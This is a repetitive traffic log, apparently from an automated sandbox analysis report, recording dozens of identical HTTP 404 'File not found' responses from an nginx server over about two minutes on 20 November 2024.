Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
